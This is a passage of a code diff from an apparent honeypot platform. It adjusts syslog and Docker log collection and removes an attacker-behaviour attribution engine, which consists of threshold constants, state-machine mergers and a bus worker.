else:
attacker_ip = raw
attacker_ip = fields[fname]
break
# Fallback for plain `logger` callers that don't use SD params (notably
@@ -513,12 +220,6 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
except ValueError:
ts_formatted = ts_raw
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
# "CMD ") get event_type rewritten to "command". `fields` stays empty
# so the frontend's msg-based pill rendering doesn't double up.
if event_type == "-" and msg.startswith("CMD "):
event_type = "command"
return {
"timestamp": ts_formatted,
"decky": decky,
@@ -645,7 +346,7 @@ def _stream_container(
publish_fn: CollectorPublishFn | None = None,
) -> None:
"""Stream logs from one container and append to the host log files."""
import docker
import docker # type: ignore[import]
lf: Optional[Any] = None
jf: Optional[Any] = None
@@ -715,17 +416,12 @@ def _make_system_log_publisher(
thread can call it unconditionally. Otherwise each call is marshalled
onto *loop* (the asyncio event loop that owns the bus socket) via
``make_thread_safe_publisher``.
The same call also feeds a :class:`_SessionAggregator` so shell
commands are indexed per-attacker_ip and ``attacker.session.ended``
fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
"""
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
if raw_publish is None:
return lambda _parsed: None
topic = _topics.system(_topics.SYSTEM_LOG)
aggregator = _SessionAggregator(raw_publish)
def _publish(parsed: dict[str, Any]) -> None:
event_type = parsed.get("event_type", "")
@@ -740,7 +436,6 @@ def _make_system_log_publisher(
},
event_type,
)
aggregator.add_event(parsed)
return _publish
@@ -755,7 +450,7 @@ async def log_collector_worker(log_file: str) -> None:
Watches Docker events to pick up containers started after initial scan.
"""
import docker
import docker # type: ignore[import]
log_path = Path(log_file)
json_path = log_path.with_suffix(".json")

View File

@@ -39,7 +39,6 @@ Shape::
master-host = 10.0.0.1 # required on agents
syslog-port = 6514
swarmctl-port = 8770
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
[logging]
system-log = /var/log/decnet/decnet.system.log
@@ -121,7 +120,6 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
"master-host": "DECNET_SWARM_MASTER_HOST",
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
"swarmctl-port": "DECNET_SWARMCTL_PORT",
"swarmctl-host": "DECNET_SWARMCTL_HOST",
},
"logging": {
"system-log": "DECNET_SYSTEM_LOGS",

View File

@@ -1,21 +0,0 @@
"""DECNET attribution engine — v0 aggregation library.
Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
observations. No I/O, no bus, no DB. The bus subscriber and DB writes
live in :mod:`decnet.correlation.attribution_worker` so this package
stays trivially testable with synthetic observation lists.
See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
explicit bright line: this engine does NOT do persona classification
(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
named persons. It surfaces *behavioural coherence* and *behavioural
drift*, and stops there.
"""
from __future__ import annotations
from decnet.correlation.attribution.aggregate import (
AttributionState,
aggregate_observations,
)
__all__ = ["AttributionState", "aggregate_observations"]

View File

@@ -1,62 +0,0 @@
"""Calibration thresholds for the attribution engine — every magic
number lives here, named, with the calibration source cited.
v0 values are heuristic. Real calibration ships when red-team
exercises produce labelled trace data
(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
are the engine's only knobs; aggregate.py never embeds a literal.
"""
from __future__ import annotations
# ── Categorical merger ────────────────────────────────────────────────
# Last-N window size for the categorical state machine. 5 calibrates
# against typical session counts (most attackers are observed < 10
# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
# 2"). Operators with long-running attackers will want a wider window
# in v1.
# NOTE(review): ``aggregate_numeric`` also uses this value as its
# recent/older window size — there is no separate numeric window knob.
CATEGORICAL_WINDOW_N = 5
# Minimum observations before the categorical and numeric mergers emit
# anything other than ``unknown``. Below this floor the state machine
# has no signal.
MIN_OBSERVATIONS_FOR_STATE = 3
# Categorical merger is one-outlier-tolerant: in a window of N=5, the
# window counts as having a clear majority if at least
# ``CATEGORICAL_MAJORITY_THRESHOLD`` observations agree. For windows
# shorter than the threshold, every observation must agree.
CATEGORICAL_MAJORITY_THRESHOLD = 4
# ── Numeric merger ────────────────────────────────────────────────────
# EWMA smoothing factor for numeric primitives. 0.3 weights recent
# observations enough to surface drift quickly without flapping on
# single outliers.
NUMERIC_EWMA_ALPHA = 0.3
# Coefficient-of-variation thresholds: dispersion / |mean|.
# NOTE(review): ``NUMERIC_STABLE_DISPERSION_PCT`` is not read by
# ``aggregate_numeric`` — confirm whether it is still needed.
NUMERIC_STABLE_DISPERSION_PCT = 0.20 # < 20% of mean → stable
NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30 # mean moved >= 30% → drifting
NUMERIC_CONFLICT_DISPERSION_PCT = 1.0 # > 100% of mean → conflicted
# ── Hash merger ───────────────────────────────────────────────────────
# Rotations within ``HASH_DRIFT_WINDOW_SECS`` of the newest observation
# count toward state transitions: 1..``HASH_DRIFT_MAX`` rotations →
# drifting; more than ``HASH_DRIFT_MAX`` → conflicted. The values mirror
# the DEBT-032 fingerprint-rotation calibration — bumped by one because
# the attribution engine takes one rotation as evidence-of-life, not
# yet evidence-of-drift.
HASH_DRIFT_MAX = 2
HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60 # 24h
# ── Multi-actor cap ───────────────────────────────────────────────────
# multi_actor confidence is capped to keep the dashboard honest about
# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
# flapping primitives on flaky networks look like two operators.
MULTI_ACTOR_MAX_CONFIDENCE = 0.6
# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
# Minimum number of primitives that must independently flag
# ``multi_actor`` for the same identity before
# ``attribution.profile.multi_actor_suspected`` fires.
MULTI_ACTOR_MIN_PRIMITIVES = 2
# Default tick interval (seconds) for the periodic walk in
# :mod:`decnet.correlation.attribution_worker`. Configurable via env
# var in v1; hardcoded in v0.
MULTI_ACTOR_TICK_SECS = 60.0

View File

@@ -1,418 +0,0 @@
"""Per-(identity, primitive) state-machine — the attribution engine's
core merge logic.
Pure: given a list of BEHAVE observations for one
``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
returns the derived state. No DB, no bus, no I/O. The worker
(``decnet.correlation.attribution_worker``) is responsible for loading
the observations and writing the state row.
State vocabulary is frozen at five values (see
``ATTRIBUTION-ENGINE.md``):
* ``unknown`` — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
* ``stable`` — recent N agree
* ``drifting`` — recent N stable but disagree with older N
* ``conflicted`` — recent N split
* ``multi_actor`` — conflicted + cross-session alternation pattern
Phase 2 ships :func:`aggregate_categorical` (the dominant ValueKind
for BEHAVE-SHELL primitives). Phase 3 adds the numeric + hash mergers
(:func:`aggregate_numeric`, :func:`aggregate_hash`) and the ValueKind
dispatcher in :func:`aggregate_observations`.
"""
from __future__ import annotations
from collections import Counter
from dataclasses import dataclass
from typing import Any, Sequence
from decnet.correlation.attribution import _thresholds as _T
__all__ = [
"AttributionState",
"aggregate_observations",
"aggregate_categorical",
"aggregate_numeric",
"aggregate_hash",
]
@dataclass(frozen=True)
class AttributionState:
    """Immutable result of merging one ``(identity, primitive)`` series.

    The merger fills in only the derived fields below. It does not own
    the natural key: the caller is expected to add ``identity_uuid`` and
    ``primitive`` (and a ``last_change_ts`` taken from the prior row)
    when persisting the state.
    """

    # Value to display: the latest raw value, the window majority, or a
    # smoothed estimate, depending on which merger produced the state.
    current_value: Any
    # One of "unknown", "stable", "drifting", "conflicted", "multi_actor".
    state: str
    # Merger-specific confidence score.
    confidence: float
    # Number of observations the merger was given.
    observation_count: int
    # ``ts`` of the newest observation (0.0 when there were none).
    last_observation_ts: float
def aggregate_observations(
    observations: Sequence[dict[str, Any]],
    *,
    value_kind: str | None = None,
) -> AttributionState:
    """Dispatch *observations* to the merger matching *value_kind*.

    Args:
        observations: Dicts for one ``(identity, primitive)`` pair. The
            mergers read ``value`` and ``ts`` from each entry and treat
            the last entry as the newest. Entries are passed through
            untouched — nothing is collapsed or grouped here.
        value_kind: ``"categorical"`` (or ``None``, treated the same),
            ``"numeric"`` or ``"hash"``.

    Returns:
        The derived :class:`AttributionState`. An empty *observations*
        sequence yields the ``unknown`` state regardless of
        *value_kind*.

    Raises:
        ValueError: *value_kind* is not one of the accepted values and
            *observations* is non-empty.
    """
    if not observations:
        return _unknown(0.0, count=0)

    kind = "categorical" if value_kind is None else value_kind
    if kind == "categorical":
        return aggregate_categorical(observations)
    if kind == "numeric":
        return aggregate_numeric(observations)
    if kind == "hash":
        return aggregate_hash(observations)

    raise ValueError(
        f"aggregate_observations: unknown value_kind={value_kind!r}; "
        "expected 'categorical' | 'numeric' | 'hash' | None",
    )
def aggregate_numeric(
    observations: Sequence[dict[str, Any]],
) -> AttributionState:
    """Merge a series of numeric observations into one state.

    The last ``CATEGORICAL_WINDOW_N`` values form the "recent" window
    and the ``CATEGORICAL_WINDOW_N`` before them the "older" window.
    Each window is smoothed with an EWMA; dispersion of the recent
    window is its coefficient of variation (CV) around that EWMA.

    Decision order:

    1. fewer than ``MIN_OBSERVATIONS_FOR_STATE`` observations →
       ``unknown`` (confidence 0.0; value is the last observation
       coerced to float, or ``None`` for empty input)
    2. recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
       (confidence fixed at 0.5)
    3. an older window exists and the relative mean shift is
       >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
    4. otherwise → ``stable``

    For ``stable`` / ``drifting`` the confidence is
    ``1 - min(CV, 1.0)``. From step 2 onward ``current_value`` is the
    recent EWMA, not the last raw observation. This merger never
    returns ``multi_actor``.
    """
    total = len(observations)
    latest_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0

    def _result(value: Any, label: str, score: float) -> AttributionState:
        # Count and timestamp are identical on every exit path.
        return AttributionState(
            current_value=value,
            state=label,
            confidence=score,
            observation_count=total,
            last_observation_ts=latest_ts,
        )

    if total < _T.MIN_OBSERVATIONS_FOR_STATE:
        latest_value = _safe_float(observations[-1].get("value")) if total else None
        return _result(latest_value, "unknown", 0.0)

    span = _T.CATEGORICAL_WINDOW_N
    recent_vals = [_safe_float(obs.get("value")) for obs in observations[-span:]]
    older_vals = [
        _safe_float(obs.get("value"))
        for obs in observations[-2 * span: -span]
    ]

    recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
    recent_cv = _coef_of_variation(recent_vals, recent_mean)
    if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
        return _result(recent_mean, "conflicted", 0.5)

    label = "stable"
    if older_vals:
        older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
        # Avoid dividing by zero: an older mean of 0 is measured
        # against a unit baseline instead.
        baseline = abs(older_mean) if older_mean != 0 else 1.0
        if abs(recent_mean - older_mean) / baseline >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT:
            label = "drifting"

    return _result(recent_mean, label, max(0.0, 1.0 - min(recent_cv, 1.0)))
def aggregate_hash(
    observations: Sequence[dict[str, Any]],
) -> AttributionState:
    """Merge a series of hash-valued observations into one state.

    Only observations whose ``ts`` lies within
    ``HASH_DRIFT_WINDOW_SECS`` of the newest observation are
    considered. ``rotations`` is the number of distinct non-``None``
    values in that window minus one (never below zero):

    * empty input → ``unknown``
    * 0 rotations → ``stable``
    * 1 .. ``HASH_DRIFT_MAX`` rotations → ``drifting``
    * more than ``HASH_DRIFT_MAX`` rotations → ``conflicted``

    A single observation is therefore already ``stable``.
    ``current_value`` is the newest observation's value and confidence
    is ``1 / (1 + rotations)``. Hash values are compared as given;
    nothing is recomputed here.
    """
    total = len(observations)
    if total == 0:
        return _unknown(0.0, count=0)

    newest = observations[-1]
    newest_ts = float(newest.get("ts", 0.0))
    newest_value = newest.get("value")

    horizon = newest_ts - _T.HASH_DRIFT_WINDOW_SECS
    windowed = [
        obs for obs in observations
        if float(obs.get("ts", 0.0)) >= horizon
    ]
    hashes = {obs.get("value") for obs in windowed}
    hashes.discard(None)  # a missing value is not a distinct hash
    rotations = max(0, len(hashes) - 1)

    if rotations == 0:
        label = "stable"
    else:
        label = "drifting" if rotations <= _T.HASH_DRIFT_MAX else "conflicted"

    return AttributionState(
        current_value=newest_value,
        state=label,
        confidence=1.0 / (1.0 + rotations),
        observation_count=total,
        last_observation_ts=newest_ts,
    )
def _ewma(values: Sequence[float], alpha: float) -> float:
"""Single-pass EWMA. Empty input is illegal; callers gate on
``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
it = iter(values)
smoothed = next(it)
for v in it:
smoothed = alpha * v + (1.0 - alpha) * smoothed
return smoothed
def _coef_of_variation(values: Sequence[float], mean: float) -> float:
"""Population-style CV = stdev / |mean|. Returns 0 on a constant
signal; returns +inf-equivalent (1e9) when the mean is exactly
zero and the signal isn't constant — so the conflicted threshold
fires without us having to special-case it upstream."""
if not values:
return 0.0
diffs_sq = [(v - mean) ** 2 for v in values]
variance = sum(diffs_sq) / len(values)
stdev = variance ** 0.5
if mean == 0:
return 0.0 if stdev == 0 else 1e9
return stdev / abs(mean)
def _safe_float(value: Any) -> float:
"""Defensive coercion — observations may carry value=None on
unknown-emitter primitives. Treat None as 0.0; the dispersion
check will surface the resulting flat baseline as 'stable'
which is the honest answer for a single-observation primitive
that hasn't fired yet."""
if value is None:
return 0.0
if isinstance(value, bool):
return 1.0 if value else 0.0
return float(value)
def aggregate_categorical(
    observations: Sequence[dict[str, Any]],
) -> AttributionState:
    """Merge a series of categorical observations into one state.

    The last ``CATEGORICAL_WINDOW_N`` observations form the "recent"
    window and the ``CATEGORICAL_WINDOW_N`` before them the "older"
    window. A window has a *clear majority* when its most common value
    occurs at least ``min(CATEGORICAL_MAJORITY_THRESHOLD, window size)``
    times.

    * empty input → ``unknown`` (same result as the numeric and hash
      mergers, instead of an ``IndexError``)
    * fewer than ``MIN_OBSERVATIONS_FOR_STATE`` observations → ``unknown``
    * recent window split + alternation pattern → ``multi_actor``
    * recent window split, no alternation → ``conflicted``
    * recent clear, no older window → ``stable``
    * recent clear, older window split or with a different majority →
      ``drifting``
    * recent clear and equal to the older majority → ``stable``

    Confidence is the share of the recent window held by its most
    common value; for ``multi_actor`` it is capped at
    ``MULTI_ACTOR_MAX_CONFIDENCE``. ``current_value`` is the newest
    observation's value for ``unknown`` / ``conflicted`` /
    ``multi_actor`` and the recent majority value for ``stable`` /
    ``drifting``.
    """
    n = len(observations)
    if n == 0:
        # Exported entry point: callers that bypass
        # aggregate_observations() must not crash on an empty series.
        return _unknown(0.0, count=0)

    last_ts = float(observations[-1].get("ts", 0.0))
    last_value = observations[-1].get("value")

    def _state(value: Any, label: str, score: float) -> AttributionState:
        # Count and timestamp are identical on every exit path.
        return AttributionState(
            current_value=value,
            state=label,
            confidence=score,
            observation_count=n,
            last_observation_ts=last_ts,
        )

    if n < _T.MIN_OBSERVATIONS_FOR_STATE:
        return _state(last_value, "unknown", 0.0)

    window = _T.CATEGORICAL_WINDOW_N
    recent = observations[-window:]
    recent_count = Counter(o.get("value") for o in recent)
    top_value, top_count = recent_count.most_common(1)[0]
    recent_size = len(recent)
    confidence = top_count / recent_size
    is_recent_clear = top_count >= min(
        _T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
    )

    if not is_recent_clear:
        # Split recent window. Distinguish multi_actor (alternation)
        # from random conflict.
        if _is_alternation(observations):
            return _state(
                last_value,
                "multi_actor",
                min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
            )
        return _state(last_value, "conflicted", confidence)

    # Recent window has a clear majority. Compare to the prior window
    # to decide stable vs drifting.
    older = observations[-2 * window: -window]
    if not older:
        # At most one window's worth of data — nothing to drift from.
        return _state(top_value, "stable", confidence)

    older_count = Counter(o.get("value") for o in older)
    older_top_value, older_top_count = older_count.most_common(1)[0]
    older_clear = older_top_count >= min(
        _T.CATEGORICAL_MAJORITY_THRESHOLD, len(older),
    )

    # Drift covers both "older window was itself split and we have just
    # converged" and "older window agreed on a different value".
    if not older_clear or older_top_value != top_value:
        return _state(top_value, "drifting", confidence)
    return _state(top_value, "stable", confidence)
def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
    """Report whether the recent window flips back and forth between
    exactly two values (A → B → A → B) rather than thrashing randomly.

    Looks at the last ``CATEGORICAL_WINDOW_N`` observations and returns
    ``True`` only when all of the following hold:

    * the window contains at least 4 observations,
    * it contains exactly 2 distinct values,
    * the number of adjacent value changes ("flips") is at least twice
      the number of adjacent repeats, with the repeat count floored
      at 1.
    """
    tail = observations[-_T.CATEGORICAL_WINDOW_N:]
    if len(tail) < 4:
        return False

    seq = [obs.get("value") for obs in tail]
    if len(set(seq)) != 2:
        return False

    flips = sum(cur != prev for prev, cur in zip(seq, seq[1:]))
    repeats = (len(seq) - 1) - flips
    return flips >= 2 * max(repeats, 1)
def _unknown(last_ts: float, *, count: int) -> AttributionState:
    """Build the ``unknown`` state: no value, zero confidence.

    Args:
        last_ts: Stored as ``last_observation_ts``.
        count: Stored as ``observation_count``.
    """
    blank = AttributionState(
        current_value=None,
        state="unknown",
        confidence=0.0,
        observation_count=count,
        last_observation_ts=last_ts,
    )
    return blank

View File

@@ -1,394 +0,0 @@
"""Attribution-engine bus subscriber — v0 Phase 1 skeleton.
Subscribes to ``attacker.observation.>`` and, for each event, ensures
the source attacker has a stub identity in ``attacker_identities``.
Phase 1 does **not** invoke the merger or write
``attribution_state`` rows; that wiring lands in Phase 4 once the
Phase 2/3 mergers are in.
Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
with a wake event, fall back to poll-only if the bus is unavailable,
publish derived events with :func:`publish_safely`, log per-handler
exceptions and continue.
Trigger isolation: the per-event handler is wrapped in a single
try/except. Any exception is logged and the loop continues with the
next event. This is the same posture BEHAVE-SHELL's
``_handler.handle_session_ended`` adopts.
"""
from __future__ import annotations
import asyncio
import contextlib
from typing import Any
from decnet.bus import topics as _topics
from decnet.bus.base import BaseBus
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
publish_safely,
run_control_listener_signal as _run_control_listener_signal,
run_health_heartbeat as _run_health_heartbeat,
)
from decnet.correlation.attribution import _thresholds as _T
from decnet.correlation.attribution.aggregate import aggregate_observations
from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository
try:
from behave_shell.spec import (
PRIMITIVE_REGISTRY,
ValueKind,
)
_BEHAVE_REGISTRY_AVAILABLE = True
except ImportError: # pragma: no cover
PRIMITIVE_REGISTRY = {}
ValueKind = None
_BEHAVE_REGISTRY_AVAILABLE = False
log = get_logger("correlation.attribution_worker")
_WORKER_NAME = "attribution"
_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
async def run_attribution_loop(
    repo: BaseRepository,
    *,
    shutdown: asyncio.Event | None = None,
    multi_actor_tick_secs: float | None = None,
) -> None:
    """Supervise the attribution worker until it is told to stop.

    After connecting to the bus, four background tasks are started:

    1. ``_consume_observations`` — subscription on the observation
       pattern; each event goes through ``handle_observation_event``.
    2. ``_multi_actor_tick_loop`` — periodic cross-primitive correlator.
    3. The health heartbeat for this worker name.
    4. The control listener for this worker name.

    If obtaining or connecting the bus (or starting a task) raises, a
    warning is logged and the function simply waits for shutdown with
    whatever tasks were already started; nothing here retries.

    *shutdown* is an optional external stop signal; when omitted a private
    event is created, so the function then only returns on cancellation.
    *multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``.

    ``CancelledError`` / ``KeyboardInterrupt`` raised while waiting are
    logged and not re-raised. On every exit path the background tasks are
    cancelled and awaited one by one, then the bus is closed; errors during
    that cleanup are suppressed.
    """
    log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)

    bus: BaseBus | None = None
    # Started tasks, in start order; cleanup cancels them in the same order.
    background: list[asyncio.Task] = []
    tick_secs = (
        _T.MULTI_ACTOR_TICK_SECS
        if multi_actor_tick_secs is None
        else multi_actor_tick_secs
    )

    try:
        candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
        await candidate.connect()
        # Only publish the handle once the connection succeeded, so the
        # cleanup below never closes a bus that failed to connect.
        bus = candidate
        background.append(
            asyncio.create_task(_consume_observations(bus, repo)),
        )
        background.append(
            asyncio.create_task(_multi_actor_tick_loop(bus, repo, tick_secs)),
        )
        background.append(
            asyncio.create_task(_run_health_heartbeat(bus, _WORKER_NAME)),
        )
        background.append(
            asyncio.create_task(_run_control_listener_signal(bus, _WORKER_NAME)),
        )
    except Exception as exc:  # noqa: BLE001
        log.warning(
            "attribution worker: bus unavailable, idle until bus returns: %s",
            exc,
        )

    stop_signal = shutdown if shutdown is not None else asyncio.Event()
    try:
        await stop_signal.wait()
    except (asyncio.CancelledError, KeyboardInterrupt):
        log.info("attribution worker stopped")
    finally:
        for running in background:
            running.cancel()
            with contextlib.suppress(asyncio.CancelledError, Exception):
                await running
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
async def _consume_observations(
    bus: BaseBus, repo: BaseRepository,
) -> None:
    """Forward every event on the observation pattern to the handler.

    Each event is passed to :func:`handle_observation_event`. A handler
    exception is logged with its traceback and the loop moves on to the
    next event, so one bad payload does not end the subscription.

    If the subscription itself fails, a warning is logged and this
    coroutine returns; it does not resubscribe. Cancellation propagates.
    """
    try:
        subscription = bus.subscribe(_OBSERVATION_PATTERN)
        async with subscription:
            async for incoming in subscription:
                try:
                    await handle_observation_event(bus, repo, incoming)
                except Exception:  # noqa: BLE001
                    # Trigger isolation: log and keep consuming.
                    log.exception("attribution worker: handler failed")
    except asyncio.CancelledError:
        raise
    except Exception as exc:  # noqa: BLE001
        log.warning(
            "attribution worker: subscriber for %s died (%s)",
            _OBSERVATION_PATTERN, exc,
        )
async def handle_observation_event(
    bus: BaseBus | None,
    repo: BaseRepository,
    event: Any,
) -> None:
    """Fold one ``attacker.observation.<primitive>`` event into attribution state.

    Steps, in order:

    1. Extract the payload; skip (debug log) if ``attacker_uuid`` or
       ``primitive`` is missing or empty.
    2. Ensure the attacker has a stub identity; if the repository returns
       ``None`` the event is deferred (info log) and nothing is written.
    3. Load the full observation series for ``(identity, primitive)``;
       return if it is empty.
    4. Run ``aggregate_observations`` with the value kind resolved by
       ``_value_kind_for``.
    5. Load the prior ``attribution_state`` row and upsert the new one.
       ``last_change_ts`` is carried over from the prior row while the
       state label is unchanged, and falls back to the new observation
       timestamp when the prior row has no usable value.
    6. When the state label changed (or there was no prior row) and a bus
       is available, publish ``ATTRIBUTION_PROFILE_STATE_CHANGED`` and log
       the transition.

    Args:
        bus: Bus used for the state-change event; ``None`` disables
            publishing (state is still persisted).
        repo: Repository providing identity, observation and state access.
        event: Either an object with a ``payload`` dict attribute or the
            payload dict itself (see ``_payload_of``).

    Exceptions from the repository or merger propagate to the caller.
    """
    payload = _payload_of(event)
    attacker_uuid = payload.get("attacker_uuid")
    primitive = payload.get("primitive")
    if not attacker_uuid or not primitive:
        log.debug(
            "attribution worker: skipping malformed event (uuid=%r primitive=%r)",
            attacker_uuid, primitive,
        )
        return

    identity_uuid = await repo.ensure_stub_identity_for_attacker(
        str(attacker_uuid),
    )
    if identity_uuid is None:
        log.info(
            "attribution worker: no Attacker row for uuid=%s yet; deferring",
            attacker_uuid,
        )
        return

    primitive_str = str(primitive)

    # Load the full per-(identity, primitive) observation series.
    # v0 with 1:1 stub identities, this is the single attacker's
    # series; v1's clusterer makes it a cross-attacker union.
    observations = await repo.observations_for_identity_primitive(
        identity_uuid, primitive_str,
    )
    if not observations:
        log.debug(
            "attribution worker: no observations yet for identity=%s "
            "primitive=%s (race with upsert)",
            identity_uuid, primitive_str,
        )
        return

    # Run merger.
    value_kind = _value_kind_for(primitive_str)
    new_state = aggregate_observations(observations, value_kind=value_kind)

    # Load prior state to detect transitions.
    prior = await repo.get_attribution_state(identity_uuid, primitive_str)
    prior_state = prior.get("state") if prior else None
    state_changed = prior is None or prior_state != new_state.state

    # Persist. last_change_ts is locked to the prior row when state is
    # unchanged so the dashboard's "stable since" timestamp doesn't
    # reset on every observation. A prior row whose last_change_ts is
    # missing or None falls back to the new observation timestamp
    # instead of raising from float(None).
    last_change_ts = new_state.last_observation_ts
    if prior is not None and not state_changed:
        prior_change_ts = prior.get("last_change_ts")
        if prior_change_ts is not None:
            last_change_ts = float(prior_change_ts)

    await repo.upsert_attribution_state({
        "identity_uuid": identity_uuid,
        "primitive": primitive_str,
        "current_value": new_state.current_value,
        "state": new_state.state,
        "confidence": new_state.confidence,
        "observation_count": new_state.observation_count,
        "last_change_ts": last_change_ts,
        "last_observation_ts": new_state.last_observation_ts,
    })

    # Emit state_changed only on transition. Idempotent re-runs (same
    # observations, same merger output) produce no event — matches
    # the loop-prevention invariant that ttp.tagged uses.
    if state_changed and bus is not None:
        await publish_safely(
            bus,
            _topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
            {
                "identity_uuid": identity_uuid,
                "primitive": primitive_str,
                "old_state": prior_state,
                "new_state": new_state.state,
                "current_value": new_state.current_value,
                "confidence": new_state.confidence,
                "observation_count": new_state.observation_count,
                "ts": new_state.last_observation_ts,
            },
            event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
        )
        log.info(
            "attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
            identity_uuid, primitive_str,
            prior_state or "<new>", new_state.state,
            new_state.confidence,
        )
def _value_kind_for(primitive: str) -> str:
    """Map a BEHAVE primitive name onto the merger tag used by the engine.

    The result is one of three strings:

    * ``"numeric"`` when the registry entry's kind is ``ValueKind.NUMERIC``
    * ``"hash"`` when it is ``ValueKind.HASH``
    * ``"categorical"`` for every other kind

    ``"categorical"`` is also the fallback when the BEHAVE registry could
    not be imported, when ``ValueKind`` is unavailable, or when the
    primitive has no registry entry.
    """
    if _BEHAVE_REGISTRY_AVAILABLE:
        spec = PRIMITIVE_REGISTRY.get(primitive)
        if spec is not None and ValueKind is not None:
            if spec.kind is ValueKind.NUMERIC:
                return "numeric"
            if spec.kind is ValueKind.HASH:
                return "hash"
    # Registry unavailable, registry miss, or a non-numeric/non-hash kind.
    return "categorical"
def _payload_of(event: Any) -> dict[str, Any]:
    """Return the payload dict carried by *event*.

    *event* may be an object exposing a ``payload`` attribute or the
    payload itself. Anything that does not end up being a ``dict`` yields
    an empty dict.
    """
    try:
        candidate = event.payload
    except AttributeError:
        # No ``payload`` attribute: treat the event itself as the payload.
        candidate = event
    if isinstance(candidate, dict):
        return candidate
    return {}
async def _multi_actor_tick_loop(
    bus: BaseBus, repo: BaseRepository, interval_secs: float,
) -> None:
    """Run :func:`tick_multi_actor` forever, pausing *interval_secs* between passes.

    The dedupe map handed to each pass is created once here and lives only
    in memory, so it starts empty every time this coroutine is started.

    A failing pass is logged with its traceback and the loop continues
    after the usual sleep. The loop ends only through cancellation, which
    propagates to the caller.
    """
    # identity_uuid -> primitive set that was last announced for it.
    fired_signatures: dict[str, frozenset[str]] = {}
    while True:
        try:
            await tick_multi_actor(bus, repo, fired_signatures)
        except Exception:  # noqa: BLE001
            log.exception("attribution worker: multi_actor tick failed")
        await asyncio.sleep(interval_secs)
async def tick_multi_actor(
    bus: BaseBus | None,
    repo: BaseRepository,
    last_fired: dict[str, frozenset[str]],
) -> int:
    """Run one pass of the cross-primitive correlator. Public for tests.

    For every identity returned by ``repo.list_multi_actor_identities()``
    whose primitive list has at least ``MULTI_ACTOR_MIN_PRIMITIVES``
    entries, an ``ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED`` event is
    published unless the same primitive set was already recorded for that
    identity in *last_fired*.

    Args:
        bus: Bus to publish on. With ``None`` the dedupe map is still
            updated but nothing is published, logged or counted.
        repo: Repository providing ``list_multi_actor_identities``.
        last_fired: Mutable dedupe map (identity UUID -> primitive set),
            updated in place. Identities that did not qualify in this pass
            are removed so that they re-arm.

    Returns:
        The number of events published in this pass.
    """
    candidates = await repo.list_multi_actor_identities()
    fired = 0
    # Identities that qualified (met the threshold) in this pass.
    seen_now: set[str] = set()
    for entry in candidates:
        identity_uuid = str(entry["identity_uuid"])
        primitives: list[str] = sorted(entry.get("primitives") or [])
        if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
            # Repo already filters to >= 2 today; defensive against
            # future schema drift. Deliberately NOT recorded in seen_now:
            # an identity listed below the threshold must be dropped from
            # last_fired by the re-arm sweep below, otherwise it would
            # never re-fire when it returns to its previous primitive set.
            continue
        seen_now.add(identity_uuid)
        signature = frozenset(primitives)
        if last_fired.get(identity_uuid) == signature:
            continue
        last_fired[identity_uuid] = signature
        if bus is None:
            continue
        await publish_safely(
            bus,
            _topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
            {
                "identity_uuid": identity_uuid,
                "primitives": primitives,
                "evidence_summary": (
                    f"{len(primitives)} primitives flagged multi_actor"
                ),
                "confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
                "ts": _now(),
            },
            event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
        )
        fired += 1
        log.info(
            "attribution worker: multi_actor_suspected identity=%s primitives=%s",
            identity_uuid, primitives,
        )
    # Rearm: any identity that was in last_fired but did not qualify in
    # this pass dropped below the threshold; remove so the next
    # qualifying flap re-fires.
    for stale in [k for k in last_fired if k not in seen_now]:
        del last_fired[stale]
    return fired
def _now() -> float:
    """Return the current wall-clock time in seconds since the epoch.

    Kept as a tiny wrapper so tests can monkeypatch it.
    """
    import time as _time

    return _time.time()
__all__ = [
"run_attribution_loop",
"handle_observation_event",
"tick_multi_actor",
]

View File

@@ -1,153 +0,0 @@
"""Attacker substrate-fingerprint rotation detection.
